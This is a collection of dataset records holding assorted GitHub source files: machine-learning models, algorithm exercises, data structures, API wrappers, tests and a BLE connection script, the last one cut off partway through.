self.embedding(speaker_id)\r\n # # print(s_feature.shape)\r\n\r\n P = [s_feature]\r\n for l in range(config.layers):\r\n P_l_1 = torch.bmm(s_adj.permute(0, 2, 1), P[l])\r\n Agg = self.gather[l](H[l], adj, s_mask)\r\n if config.att_agg:\r\n H_l = self.agg[l](H[l], P_l_1, Agg)\r\n else:\r\n Agg_ = torch.cat([H[l], P_l_1, Agg], dim=-1) # B,N,D,3\r\n H_l = F.relu(self.agg[l](Agg_))\r\n H_l = self.dropout(H_l)\r\n H.append(H_l)\r\n # update P_l from all utteracne and P_l_1\r\n P_l = torch.bmm(s_adj, H[l])\r\n P_l = self.grus[l](P[l], P_l)\r\n P.append(P_l)\r\n p_sim = self.sim_loss(P[-1])\r\n # print(P[-1].shape, H[-1].shape)\r\n # H = torch.cat([P_l_1, H[-1]],dim=-1)\r\n logits = self.out_mlp(H[-1])\r\n # logits = self.out_mlp(H0)\r\n return logits, p_sim\r\n\r\n def sim_loss(self, p):\r\n p_sim = torch.bmm(p, p.permute(0, 2, 1))\r\n m = p_sim.shape[-1]\r\n b = p_sim.shape[0]\r\n mask = torch.ones_like(p_sim)\r\n eyes = torch.eye(m).repeat(b,1,1).cuda()\r\n mask = mask - eyes\r\n p_sim = p_sim*mask\r\n p_sim = torch.mean(p_sim, dim=-1)\r\n p_sim = torch.mean(p_sim, dim=-1)\r\n p_sim = torch.mean(p_sim, dim=-1)\r\n return p_sim","repo_name":"songruiecho/SUNET","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":14401,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"392879239","text":"# Projeto 2 de Inteligencia Artificial\r\n#\r\n# Grupo 22\r\n#\r\n# Miguel Sena - 86420\r\n# Joao Palet - 86447 \r\n\r\nimport random\r\nimport numpy as np\r\nimport copy\r\nfrom random import randint\r\n\r\nfrom tempfile import TemporaryFile\r\noutfile = TemporaryFile()\r\n\t\r\nclass finiteMDP:\r\n\r\n def __init__(self, nS, nA, gamma, P=[], R=[], absorv=[]):\r\n self.nS = nS\r\n self.nA = nA\r\n self.gamma = gamma\r\n self.Q = np.zeros((self.nS,self.nA))\r\n self.P = P\r\n self.R = R\r\n self.absorv = absorv\r\n # completar se necessario\r\n \r\n \r\n def runPolicy(self, n, x0, poltype = 'greedy', polpar=[]):\r\n #nao alterar\r\n traj = np.zeros((n,4))\r\n x = x0\r\n J = 0\r\n for ii in range(0,n):\r\n a = self.policy(x,poltype,polpar)\r\n r = self.R[x,a]\r\n y = np.nonzero(np.random.multinomial( 1, self.P[x,a,:]))[0][0]\r\n traj[ii,:] = np.array([x, a, y, r])\r\n J = J + r * self.gamma**ii\r\n if self.absorv[x]:\r\n y = x0\r\n x = y\r\n \r\n return J,traj\r\n\r\n\r\n def VI(self):\r\n #nao alterar\r\n nQ = np.zeros((self.nS,self.nA))\r\n while True:\r\n self.V = np.max(self.Q,axis=1) \r\n for a in range(0,self.nA):\r\n nQ[:,a] = self.R[:,a] + self.gamma * np.dot(self.P[:,a,:],self.V)\r\n err = np.linalg.norm(self.Q-nQ)\r\n self.Q = np.copy(nQ)\r\n if err<1e-7:\r\n break\r\n \r\n #update policy\r\n self.V = np.max(self.Q,axis=1) \r\n #correct for 2 equal actions\r\n self.Pol = np.argmax(self.Q, axis=1)\r\n \r\n return self.Q, self.Q2pol(self.Q)\r\n\r\n \r\n def traces2Q(self, trace):\r\n nextQ = copy.deepcopy(self.Q)\r\n\r\n while True:\r\n for move in trace:\r\n initialState = int(move[0])\r\n action = int(move[1])\r\n finalState = int(move[2])\r\n reward = move[3]\r\n\r\n nextQ[initialState, action] = nextQ[initialState, action] + 0.2*(reward + self.gamma*max(self.Q[finalState]) - nextQ[initialState, action])\r\n\r\n err = np.linalg.norm(self.Q - nextQ)\r\n self.Q = np.copy(nextQ)\r\n\r\n if err < 1e-7:\r\n break\r\n \r\n return self.Q\r\n \r\n def policy(self, x, poltype = 'exploration', par = []): \r\n if poltype == 'exploitation':\r\n a = np.argmax(par[x])\r\n \r\n elif poltype == 'exploration':\r\n a = randint(0, 
self.nA - 1)\r\n \r\n return a\r\n \r\n def Q2pol(self, Q, eta=5):\r\n return np.exp(eta*Q)/np.dot(np.exp(eta*Q),np.array([[1,1],[1,1]]))\r\n\r\n\r\n ","repo_name":"joaopalet/LEIC-IST","sub_path":"3rd_Year/IA/proj2/Projeto/RL.py","file_name":"RL.py","file_ext":"py","file_size_in_byte":2808,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"9024301001","text":"import sys\nfrom heapq import heappush, heappop\ninput = sys.stdin.readline\n\ndef getParent(ls, x):\n if ls[x] == x:\n return ls[x]\n ls[x] = getParent(ls, ls[x])\n return ls[x]\n\ndef unionParent(ls, a, b):\n a = getParent(ls, a)\n b = getParent(ls, b)\n if a > b:\n ls[a] = b\n else:\n ls[b] = a\n\ndef findParent(ls, a, b):\n a = getParent(ls, a)\n b = getParent(ls, b)\n if a == b:\n return True\n else:\n return False\n\n\nN, M, K = map(int,input().split())\n\nparent = [i for i in range(N+1)]\n\nplant = list(map(int,input().split()))\nedges = []\nfor i in range(M):\n u, v, w = map(int,input().split())\n edges.append([w, u, v])\nedges.sort()\nfor i in range(len(plant) - 1):\n unionParent(parent, plant[i], plant[i+1])\n\nans = 0\nfor cost, from_, to_ in edges:\n if not findParent(parent, from_, to_):\n unionParent(parent, from_, to_)\n ans += cost\n\nprint(ans)\n","repo_name":"HiGeuni/Problem-Solving","sub_path":"BaekJoon/10423.py","file_name":"10423.py","file_ext":"py","file_size_in_byte":922,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"12634550002","text":"from djsonapi import serial\n\nfrom example.testapp import models\n\n\n\n@serial.serializer(models.Report, mode=\"limited\")\ndef serialize_report_limited(obj, **kwargs):\n \"\"\"\n Serialize a report in limited mode.\n \"\"\"\n # serialize_model, same as serialize_fields but with debugging information for models\n limited_data = serial.serialize_model(obj, fields=(\"title\", \"message\",))\n return limited_data\n\n\n@serial.serializer(models.Report, mode=\"full\")\ndef serialize_report_full(obj, **kwargs):\n \"\"\"\n Serialize a report in full mode.\n \"\"\"\n # Get limited data\n limited_data = serialize_report_limited(obj, **kwargs)\n # Add to it\n full_data = serial.serialize_model(obj, (\"status\"))\n full_data.update(limited_data)\n # Return the full data\n return full_data","repo_name":"explodes/djsonapi","sub_path":"example/testapp/serial.py","file_name":"serial.py","file_ext":"py","file_size_in_byte":789,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"29979815328","text":"# Binary Tree using List \n\n# -First cell will remain empty \n# -Left Child=cell[2x]\n# -Right Child = cell[2x+1]\n\n# where x is the index of rootnode cell\n\n\n# Creation of Binary Tree\n\nclass BinaryTree:\n def __init__(self,size):\n self.customList=size*[None]\n self.lastUsedIndex=0\n self.maxSize=size\n# O(1),O(n)\n\n\n# insert a value in Binary tree\n def insert(self,nodeValue):\n if self.lastUsedIndex+1==self.maxSize:\n return \"The Binary tree is full\"\n self.customList[self.lastUsedIndex+1]=nodeValue\n self.lastUsedIndex+=1\n return \"The value is successfully inserted\"\n\n\n def searchNode(self,nodevalue):\n if self.lastUsedIndex==0:\n return \"The Binary Tree is Empty\"\n else:\n for i in range(len(self.customList)):\n if self.customList[i+1]==None:\n break\n elif self.customList[i]==nodevalue:\n return \"The value is present in Binary Tree\"\n return \"The value is not present on the list\"\n\n# -Left 
Child=cell[2x]\n# -Right Child = cell[2x+1]\n\n def preorderTraversal(self,index):\n if self.lastUsedIndex==0:\n return \"The binary Tree is Empty\"\n if index>self.lastUsedIndex:\n return \n print(self.customList[index])\n self.preorderTraversal(index*2)\n self.preorderTraversal(index*2+1)\n\n# Blank return statement can be used to transfer the \n# control back to the calling function \n \n\n# Inorder traversal\n\n def inorderTraversal(self,index):\n if index>self.lastUsedIndex:\n return \n self.inorderTraversal(index*2)\n print(self.customList[index])\n self.inorderTraversal(index*2+1)\n\n\n def postorderTraversal(self,index):\n if index>self.lastUsedIndex:\n return \n self.postorderTraversal(index*2)\n self.postorderTraversal(index*2+1)\n print(self.customList[index]) \n# O(n),O(n)\n\n\n def levelordertraversal2(self,index):\n for i in range(index,self.lastUsedIndex+1):\n print(self.customList[i])\n\n\n def deleteNode(self,nodeValue):\n for i in range(1,self.lastUsedIndex):\n if self.customList[i]==nodeValue:\n self.customList[i]=self.customList[self.lastUsedIndex]\n self.customList[self.lastUsedIndex]=None\n self.lastUsedIndex-=1\n return \"The node is deleted\"\n\n\n def deleteEntire(self):\n self.customList=None\n return \"The binary is deleted\"\n \n\n \n\n\n\nnewBT =BinaryTree(8)\nnewBT.insert(\"Drinks\")\nnewBT.insert(\"Hot\")\nnewBT.insert(\"Cold\")\nnewBT.insert(\"Tea\")\nnewBT.insert(\"Coffee\")\nnewBT.insert(\"Fanta\")\nnewBT.insert(\"Cola\")\n# print(newBT.searchNode(\"fanta\"))\nnewBT.deleteEntire()\nnewBT.levelordertraversal2(1)","repo_name":"Amaan5033/Data-Structure-And-Algorithm","sub_path":"Data Structures/BinarytreeList.py","file_name":"BinarytreeList.py","file_ext":"py","file_size_in_byte":2831,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"24926101567","text":"import cg\n\nimport re\n\nimport testbox\n\nclass WindowTranslate(cg.Translate):\n\n def extract(filename, algebra):\n pat_score = re.compile('^Optimal Score: ([-.0-9]+)')\n pat_algebra = re.compile('^Algebra: ([A-Za-z0-9]+)')\n pat_end = re.compile('^================================================================================')\n pat_begin = re.compile('^============================== Suboptimal Output ===============================')\n pat_cand = re.compile('^(.+) \\(Score: ([-.0-9]+)\\)')\n pat_bounds = re.compile('^([0-9]+) +([0-9]+)')\n\n \n f = open(filename)\n look = testbox.look_into([filename])\n d = cg.WindowData()\n bounds = None\n length = -1\n state = -1\n for i in f:\n if state == -1:\n match = pat_algebra.search(i)\n if match:\n if algebra == '' or algebra == match.group(1):\n al = algebra\n else:\n raise cg.TranslateError('Wrong algebra in window mode: ' + algebra\n + ' vs. ' + match.group(1) + look)\n state = 0\n elif state == 0:\n match = pat_score.search(i)\n if match:\n e = cg.Data()\n e.algebra = al\n e.optimal_score = float(match.group(1)) / 100\n state = 1\n continue\n else:\n match = pat_bounds.search(i)\n if match:\n bounds = ( int(match.group(1)), int(match.group(2)) )\n if length < 0:\n length = len(i) - 1\n elif len(i) - 1 != length:\n raise cg.TranslateError('Length of sequence/bounds differs in window '\n + str(bounds) + ':\\n'\n + ' ' + i + ' (len: ' + str(len(i) - 1) + ' vs. len: ' \n + str(length) + look)\n elif state == 1:\n match = pat_begin.search(i)\n if match:\n state = 2\n else:\n raise cg.TranslateError('Found no start in window '\n + str(bounds) + '.' 
+ look)\n elif state == 2:\n match = pat_cand.search(i)\n if match:\n (cand, score) = match.groups()\n if len(cand) != length:\n raise cg.TranslateError('Length of candidate structures does not match in window '\n + str(bounds) + ':\\n'\n + cand + ' (len: ' + str(len(cand)) + ') vs. len: '\n + str(length) + look)\n e.candidates.append((float(score) / 100, cand))\n else:\n match = pat_end.search(i)\n d.addWindow(bounds, e)\n if match:\n state = 0\n else:\n raise cg.TranslateError('Found no end or candidate in window '\n + str(bounds) + '.' + look)\n\n f.close()\n if state != 0:\n raise cg.TranslateError('Found no end at the end.' + look)\n return d\n \n extract = staticmethod(extract)\n\n","repo_name":"u-u-h/adpc","sub_path":"testsuite/lib/cg/java/windowtranslate.py","file_name":"windowtranslate.py","file_ext":"py","file_size_in_byte":2794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"14193160215","text":"from typing import Any, Optional, List\n\n\nclass Node:\n def __init__(self, value: Any):\n self.value = value\n self.left: Optional[Node] = None\n self.right: Optional[Node] = None\n\n def __repr__(self):\n return str(self.value)\n\n\nclass BinaryTree:\n def __init__(self, head: Node):\n self.head = head\n\n def depth_first_traversal(self, node: Optional[Any], acc: List = []) -> List[Node]:\n if node:\n acc += [node.value]\n acc = self.depth_first_traversal(node.left, acc)\n acc = self.depth_first_traversal(node.right, acc)\n return acc\n else:\n return acc\n\n def breadth_first_traversal(\n self, node: Optional[Any], acc: List = []\n ) -> List[Node]:\n if node:\n if len(acc) == 0:\n acc += [self.head.value]\n for i in [node.left, node.right]:\n if i:\n acc += [i.value]\n for j in [node.left, node.right]:\n if j:\n self.breadth_first_traversal(j, acc)\n return acc\n else:\n return acc\n\n\nif __name__ == \"__main__\":\n el1 = Node(1)\n el2 = Node(2)\n el3 = Node(3)\n el4 = Node(4)\n el5 = Node(5)\n el6 = Node(6)\n\n el1.left = el2\n el1.right = el3\n el1.left.left = el4\n el1.right.left = el5\n el1.right.right = el6\n\n btree = BinaryTree(el1)\n\n acc = btree.depth_first_traversal(btree.head)\n print(acc)\n\n","repo_name":"xasopheno/study","sub_path":"binary_tree.py","file_name":"binary_tree.py","file_ext":"py","file_size_in_byte":1488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"24315603376","text":"# A test program for a bleak connection that is explicitly closed.\n\nimport asyncio\nimport platform\nimport sys\nimport time\nimport signal\nfrom bleak import BleakClient, BleakScanner\nimport signal\n\n# Adapt to your actual device.\ndevice_address = \"0C:8B:95:F2:B4:36\"\n\nsignal.signal(signal.SIGINT, lambda number, frame: sys.exit())\n\nprint(f\"OS: {platform.platform()}\", flush=True)\nprint(f\"Platform:: {platform.uname()}\", flush=True)\nprint(f\"Python {sys.version}\", flush=True)\n\n\nasync def test():\n #global client\n print(f\"Trying to connect to {device_address}\", flush=True)\n device = await BleakScanner.find_device_by_address(device_address, timeout=10.0)\n assert device\n async with BleakClient(device) as client:\n assert client.is_connected\n print(f\"Connected\", flush=True)\n print(f\"Waiting 5 secs...\", flush=True)\n time.sleep(5.0)\n print(f\"Closing...\", flush=True)\n assert client.is_connected\n await client.disconnect()\n print(f\"Test done\", 
flush=True)\n\n\nasyncio.run(test())\n","repo_name":"zapta/ble_stepper_motor_analyzer","sub_path":"python/test/connection_disconnect.py","file_name":"connection_disconnect.py","file_ext":"py","file_size_in_byte":1042,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"78"} +{"seq_id":"12982525713","text":"import torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\n\nfrom dlwizard.common import train_mnist\n\n\n# https://www.deeplearningwizard.com/deep_learning/practical_pytorch/pytorch_convolutional_neuralnetwork/\nclass CNN(nn.Module):\n\n def __init__(self):\n super().__init__()\n self.conv1 = nn.Conv2d(1, 16, kernel_size=5, stride=1, padding=2)\n self.pool1 = nn.MaxPool2d(kernel_size=2)\n self.conv2 = nn.Conv2d(16, 32, kernel_size=5, stride=1, padding=2)\n self.pool2 = nn.MaxPool2d(kernel_size=2)\n self.fc1 = nn.Linear(32 * 7 * 7, 10)\n\n def forward(self, x):\n \"\"\"\n :param x: tensor(*, 28, 28) 输入图像\n :return: tensor(*, 10)\n \"\"\"\n out = F.relu(self.conv1(x)) # (*, 16, 28, 28)\n out = self.pool1(out) # (*, 16, 14, 14)\n out = F.relu(self.conv2(out)) # (*, 32, 14, 14)\n out = self.pool2(out) # (*, 32, 7, 7)\n out = out.view(out.shape[0], -1) # (*, 32 * 7 * 7)\n out = self.fc1(out) # (*, 10)\n return out\n\n\ndef main():\n model = CNN()\n optimizer = optim.SGD(model.parameters(), lr=0.01)\n for p in model.parameters():\n print(p.size())\n train_mnist(model, optimizer, (-1, 1, 28, 28))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"ZZy979/pytorch-tutorial","sub_path":"dlwizard/cnn.py","file_name":"cnn.py","file_ext":"py","file_size_in_byte":1289,"program_lang":"python","lang":"en","doc_type":"code","stars":75,"dataset":"github-code","pt":"78"} +{"seq_id":"18707042144","text":"import numpy as np\nfrom scipy.integrate import odeint\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\n\nMb = 0.7 #Mass of Body [Kg]\nMp = 0.01 #Mass of Pad [Kg]\ng = 1.622 #Gravitational Acceleration [m/s^2] \nk1 = 1.4 #Bias Spring Coefficient [N/mm]\nl0 = 100 #Natural Length of Bias Spring [mm]\nk2 = 10 #Spring Coefficient of the ground [N/mm]\nc2 = 10 #Damping Coefficient [Ns/mm]\nZ20 = 0.0 #Initial Position of Pad [mm]\nDZ = 50 #Initial Deflextion of Bias Spring [mm]\n\ndef func1(x, t):\n return [x[1], (k1/Mb)*(l0-(x[0]-x[2]))-g, x[3], (k1/Mp)*(l0-(x[0]-x[2])\\\n\t)-(k2/Mp)*(x[2]-Z20)-(c2/Mp)*x[3]-g]\n\ndef func2(x, t):\n return [x[1], (k1/Mb)*(l0-(x[0]-x[2]))-g, x[3], (k1/Mp)*(l0-(x[0]-x[2])\\\n\t)-(k2/Mp)*(x[2]-Z20)-g]\n\ndef main():\n\tx0 = [l0-DZ, 0, 0, 0]\n\tt = np.arange(0, 10, 0.01)\n\n\tx = odeint(func1, x0, t)\n\tZ_cg = Mb/(Mb+Mp)*x[:,0]\n\tV_cg = Mb/(Mb+Mp)*x[:,1] \n\n\tprint(x)\n\tprint(np.max(V_cg))\n\tprint(np.argmax(V_cg))\n\tprint(x[10,:])\n\tindex = np.where((x[:,3]>=-0.01)&(x[:,3]<=-0.001))\n\tprint(index)\n\t#fig = plt.figure()\n\tplt.plot(t,x[:,0], label=\"Position:Body\")\n\tplt.plot(t,x[:,1], label=\"Velocity:Body\")\n\tplt.plot(t,x[:,2], label=\"Position:Pad\")\n\tplt.plot(t,x[:,3], label=\"Velocity:Pad\")\n\tplt.plot(t,Z_cg, label=\"Position:COG\")\n\tplt.plot(t,V_cg, label=\"Velocity:COG\")\n\t#ax = fig.gca(projection='3d')\n\t#ax.plot(v[:, 0], v[:, 1], v[:, 2])\n\tplt.legend()\n\tplt.show()\nif __name__ == '__main__':\n\t\tmain()\n","repo_name":"LukaDvlp/SMAHopping","sub_path":"1D_jump.py","file_name":"1D_jump.py","file_ext":"py","file_size_in_byte":1438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} 
+{"seq_id":"15682788130","text":"import sys\ninput = sys.stdin.readline\nN = int(input())\nT = list(map(int, input().split()))\nCBT = [[] for _ in range(N)]\n\ndef InOrder(list, x):\n mid = (len(list)//2)\n CBT[x].append(list[mid])\n if len(list) == 1:\n return\n InOrder(list[:mid], x+1)\n InOrder(list[mid+1:], x+1)\n\nInOrder(T, 0)\nfor i in range(N):\n print(*CBT[i])\n\n\"\"\" 9934\n전위 순회 : 루트 - 왼쪽 자식 - 오른쪽 자식\n중위 순회 : 왼쪽 자식 - 루트 - 오른쪽 자식\n후위 순회 : 왼쪽 자식 - 오른쪽 자식 - 루트\n\n상근이는 중위 순회로 빌딩들을 방문하여 종이에 적었다.\n\"\"\"\n","repo_name":"Jihyun-Choi/Algorithm","sub_path":"BOJ/python/data_structures/9934.py","file_name":"9934.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"5681462207","text":"# -*- coding: utf-8 -*-\n\nimport pytest\nimport os\nimport pandas as pd\nfrom avstockparser import AVStockParser\n\n\nclass TestBaseMethods:\n\n @pytest.fixture(scope='function', autouse=True)\n def init(self):\n AVStockParser.uLogger.level = 50 # Disable debug logging while test, logger CRITICAL = 50\n AVStockParser.uLogger.handlers[0].level = 50 # Disable debug logging for STDOUT\n # AVStockParser.uLogger.handlers[1].level = 50 # Disable debug logging for log.txt\n # set up default parameters:\n self.reqURL = r\"https://www.alphavantage.co/query?\"\n self.apiKey = \"demo\"\n self.ticker = \"IBM\" # used for demo test\n self.retry = 2\n\n def test_ParserReturnPandasDataframe(self):\n testData = [\n {\n \"reqURL\": self.reqURL,\n \"apiKey\": self.apiKey,\n \"output\": None,\n \"ticker\": self.ticker,\n \"period\": \"TIME_SERIES_INTRADAY\",\n \"interval\": \"5min\",\n \"size\": \"full\",\n \"retry\": self.retry,\n },\n {\n \"reqURL\": self.reqURL,\n \"apiKey\": self.apiKey,\n \"output\": None,\n \"ticker\": self.ticker,\n \"period\": \"TIME_SERIES_DAILY\",\n \"size\": \"full\",\n \"retry\": self.retry,\n },\n ]\n for test in testData:\n result = AVStockParser.AVParseToPD(**test)\n assert isinstance(result, pd.DataFrame) is True, \"Expected Pandas DataFrame result output!\"\n\n def test_ParserCreateOutputFile(self):\n testData = [\n {\n \"reqURL\": self.reqURL,\n \"apiKey\": self.apiKey,\n \"output\": os.path.abspath(\"tests/ibm_5min.csv\"),\n \"ticker\": self.ticker,\n \"period\": \"TIME_SERIES_INTRADAY\",\n \"interval\": \"5min\",\n \"size\": \"full\",\n \"retry\": self.retry,\n },\n {\n \"reqURL\": self.reqURL,\n \"apiKey\": self.apiKey,\n \"output\": os.path.abspath(\"tests/ibm_daily.csv\"),\n \"ticker\": self.ticker,\n \"period\": \"TIME_SERIES_DAILY\",\n \"size\": \"full\",\n \"retry\": self.retry,\n },\n ]\n for test in testData:\n AVStockParser.AVParseToPD(**test)\n assert os.path.exists(test[\"output\"]), \"Output file must be created after parser work finished!\"\n\n def test_Render(self):\n test = {\n \"reqURL\": self.reqURL,\n \"apiKey\": self.apiKey,\n \"output\": None,\n \"ticker\": self.ticker,\n \"period\": \"TIME_SERIES_DAILY\",\n \"size\": \"full\",\n \"retry\": self.retry,\n }\n parsedData = AVStockParser.AVParseToPD(**test)\n AVStockParser.Render(prices=parsedData, name=\"TEST\", show=False)\n assert os.path.exists(os.path.abspath(\"index.html\")), \"index.html file must be created!\"\n assert os.path.exists(os.path.abspath(\"index.html.md\")), \"index.html.md file must be 
created!\"\n","repo_name":"Tim55667757/AVStockParser","sub_path":"tests/test_AVStockParser.py","file_name":"test_AVStockParser.py","file_ext":"py","file_size_in_byte":3156,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"4940060554","text":"from OPENiapp.Providers.base.activity import bcActivity\nfrom OPENiapp.Providers.base.common import *\n\nclass foActivity(bcActivity):\n \"\"\" This class is used to:\n 1. Get a Foursquare Event\n \"\"\"\n # region Activity API\n # As described here: https://opensourceprojects.eu/p/openi/wiki/Activity_API\n \n # region Event Object\n # As described here: https://opensourceprojects.eu/p/openi/wiki/Event_Mapping\n \n def get_event(self, id):\n \"\"\" GET API_PATH/[EVENT_ID] \"\"\"\n # /event_id (ie /4e173d2cbd412187aabb3c04)\n raw_data = self.connector.events(id)\n \n names = ['id', 'object_type', 'service', 'resource_uri', 'from_id', 'from_object_type', 'from_resource_uri', 'from_name', 'time_created_time', 'time_edited_time', 'time_deleted_time']\n names.extend(['place_name', 'place_description', 'place_category', 'place_picture', 'place_address_street', 'place_address_number', 'place_address_apartment', 'place_address_city', 'place_address_locality', 'place_address_country', 'place_address_zip', 'place_location_latitude', 'place_location_longitude', 'place_location_height'])\n names.extend(['duration_starts_time', 'duration_ends_time'])\n names.extend(['description', 'picture', 'title'])\n\n fields = ['id', 'object_type', 'service', 'url', 'owner.id', 'owner.category', 'owner.url', 'owner.name', 'time.created_time', 'time.edited_time', 'time.deleted_time']\n fields.extend(['location', '', '', '', '', '', '', '', '', '', '', 'venue.latitude', 'venue.longitude', ''])\n fields.extend(['startAt', 'endAt'])\n fields.extend(['description', 'picture', 'name'])\n\n alternatives = ['', 'event', 'foursquare', '', '', '', '', '', '', '', '']\n alternatives.extend(['', '', '', '', '', '', '', '', '', '', '', '', '', ''])\n alternatives.extend(['', ''])\n alternatives.extend(['', '', ''])\n\n data = self.get_fields(raw_data['event'], names, fields, alternatives)\n response = {\n 'meta': {\n 'limit': self.check_if_exists(raw_data, 'limit', None),\n 'next': self.check_if_exists(raw_data, 'paging.next', None),\n 'offset': self.check_if_exists(raw_data, 'offset', 0),\n 'previous': self.check_if_exists(raw_data, 'paging.previous', None),\n 'total_count': self.check_if_exists(raw_data, 'total_count', 1)\n },\n 'objects': [self.format_event_response(data)]\n }\n \n venue_id = self.check_if_exists(raw_data, 'event.venueId')\n if (venue_id != defJsonRes):\n raw_data2 = self.connector.venues(venue_id)\n response['objects'][0]['place']['name'] = self.check_if_exists(raw_data2, 'venue.name', '')\n response['objects'][0]['place']['description'] = self.check_if_exists(raw_data2, 'venue.description', '')\n response['objects'][0]['place']['category'] = self.check_if_exists(raw_data2, 'venue.categories', '')\n response['objects'][0]['place']['picture'] = self.check_if_exists(raw_data2, 'venue.photos', '')\n response['objects'][0]['place']['address']['street'] = self.check_if_exists(raw_data2, 'venue.location.address', '')\n response['objects'][0]['place']['address']['number'] = self.check_if_exists(raw_data2, 'venue.location.number', '')\n response['objects'][0]['place']['address']['apartment'] = self.check_if_exists(raw_data2, 'venue.location.apartment', '')\n response['objects'][0]['place']['address']['city'] = 
self.check_if_exists(raw_data2, 'venue.location.city', '')\n response['objects'][0]['place']['address']['locality'] = self.check_if_exists(raw_data2, 'venue.location.locality', '')\n response['objects'][0]['place']['address']['country'] = self.check_if_exists(raw_data2, 'venue.location.country', '')\n response['objects'][0]['place']['address']['zip'] = self.check_if_exists(raw_data2, 'venue.location.postalCode', '')\n response['objects'][0]['place']['address']['latitude'] = self.check_if_exists(raw_data2, 'venue.location.lat', '')\n response['objects'][0]['place']['address']['longitude'] = self.check_if_exists(raw_data2, 'venue.location.lng', '')\n response['objects'][0]['place']['address']['height'] = self.check_if_exists(raw_data2, 'venue.location.height', '')\n\n return response\n\n def get_checkins(self):\n \"\"\" GET API_PATH/CHECKIN \"\"\"\n # / (ie /)\n raw_datas = self.connector.users.checkins()\n \n names = ['id', 'object_type', 'service', 'resource_uri', 'from_id', 'from_object_type', 'from_resource_uri', 'from_name', 'time_created_time', 'time_edited_time', 'time_deleted_time']\n names.extend(['place_name', 'place_description', 'place_category', 'place_picture', 'place_address_street', 'place_address_number', 'place_address_apartment', 'place_address_city', 'place_address_locality', 'place_address_country', 'place_address_zip', 'place_location_latitude', 'place_location_longitude', 'place_location_height'])\n names.extend(['text'])\n\n fields = ['id', 'type', 'service', 'url', 'owner.id', 'owner.category', 'owner.url', 'owner.name', 'createdAt', 'time.edited_time', 'time.deleted_time']\n fields.extend(['venue.name', '', 'venue.categories', 'photos', 'venue.location.address', '', '', 'venue.location.city', 'venue.location.state', 'venue.location.country', 'venue.location.posalCode', 'venue.location.lat', 'venue.location.lng', ''])\n fields.extend(['shout'])\n\n alternatives = ['', 'checkin', 'foursquare', '', '', '', '', '', '', '', '']\n alternatives.extend(['', '', '', '', '', '', '', '', '', '', '', '', '', ''])\n alternatives.extend([''])\n\n data = self.get_fields(raw_datas['checkins'], names, fields, alternatives)\n response = {\n 'meta': {\n 'limit': self.check_if_exists(raw_datas, 'limit', None),\n 'next': self.check_if_exists(raw_datas, 'paging.next', None),\n 'offset': self.check_if_exists(raw_datas, 'offset', 0),\n 'previous': self.check_if_exists(raw_datas, 'paging.previous', None),\n 'total_count': len(raw_datas['checkins']['items'])\n },\n 'objects': []\n }\n for raw_data in raw_datas['checkins']['items']:\n data = self.get_fields(raw_data, names, fields, alternatives)\n response['objects'].append(self.format_checkin_response(data))\n\n return response\n \n # region Connections\n\n\n # endregion Connections\n\n # endregion Event Object\n\n # endregion Activity API","repo_name":"OPENi-ict/api-framework","sub_path":"OPENiapp/OPENiapp/Providers/Foursquare/_foactivity.py","file_name":"_foactivity.py","file_ext":"py","file_size_in_byte":6716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"2560806795","text":"import tensorflow as tf\nfrom tensorflow import keras\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\nfrom tensorflow.keras.utils import to_categorical\nfrom analyse_ml_results import analyse_results\nfrom tensorflow.keras.models import Model\nfrom numpy import expand_dims\nfrom vis.visualization import visualize_saliency\nfrom vis.visualization import visualize_activation\nfrom 
tensorflow.keras import activations\nfrom vis.utils import utils\nfrom scipy.signal import butter, lfilter, freqz\nfrom scipy import signal\nfrom ecg_feature_extraction import feature_extract_ecg\nimport sys\nimport glob\nimport time\nimport gc\nimport pandas as pd\n\n# N\t\tNormal beat (displayed as \"·\" by the PhysioBank ATM, LightWAVE, pschart, and psfd)\n# L\t\tLeft bundle branch block beat\n# R\t\tRight bundle branch block beat\n# B\t\tBundle branch block beat (unspecified)\n# A\t\tAtrial premature beat\n# a\t\tAberrated atrial premature beat\n# J\t\tNodal (junctional) premature beat\n# S\t\tSupraventricular premature or ectopic beat (atrial or nodal)\n# V\t\tPremature ventricular contraction\n# r\t\tR-on-T premature ventricular contraction\n# F\t\tFusion of ventricular and normal beat (not included)\n# e\t\tAtrial escape beat\n# j\t\tNodal (junctional) escape beat\n# n\t\tSupraventricular escape beat (atrial or nodal)\n# E\t\tVentricular escape beat\n# /\t\tPaced beat\n# f\t\tFusion of paced and normal beat (not included)\n\nclass_names = ['A','E','j','L','N','P','R','V']\n\ndef focal_loss(gamma=2., alpha=4.):\n\n gamma = float(gamma)\n alpha = float(alpha)\n\n def focal_loss_fixed(y_true, y_pred):\n \"\"\"Focal loss for multi-classification\n FL(p_t)=-alpha(1-p_t)^{gamma}ln(p_t)\n Notice: y_pred is probability after softmax\n gradient is d(Fl)/d(p_t) not d(Fl)/d(x) as described in paper\n d(Fl)/d(p_t) * [p_t(1-p_t)] = d(Fl)/d(x)\n Focal Loss for Dense Object Detection\n https://arxiv.org/abs/1708.02002\n\n Arguments:\n y_true {tensor} -- ground truth labels, shape of 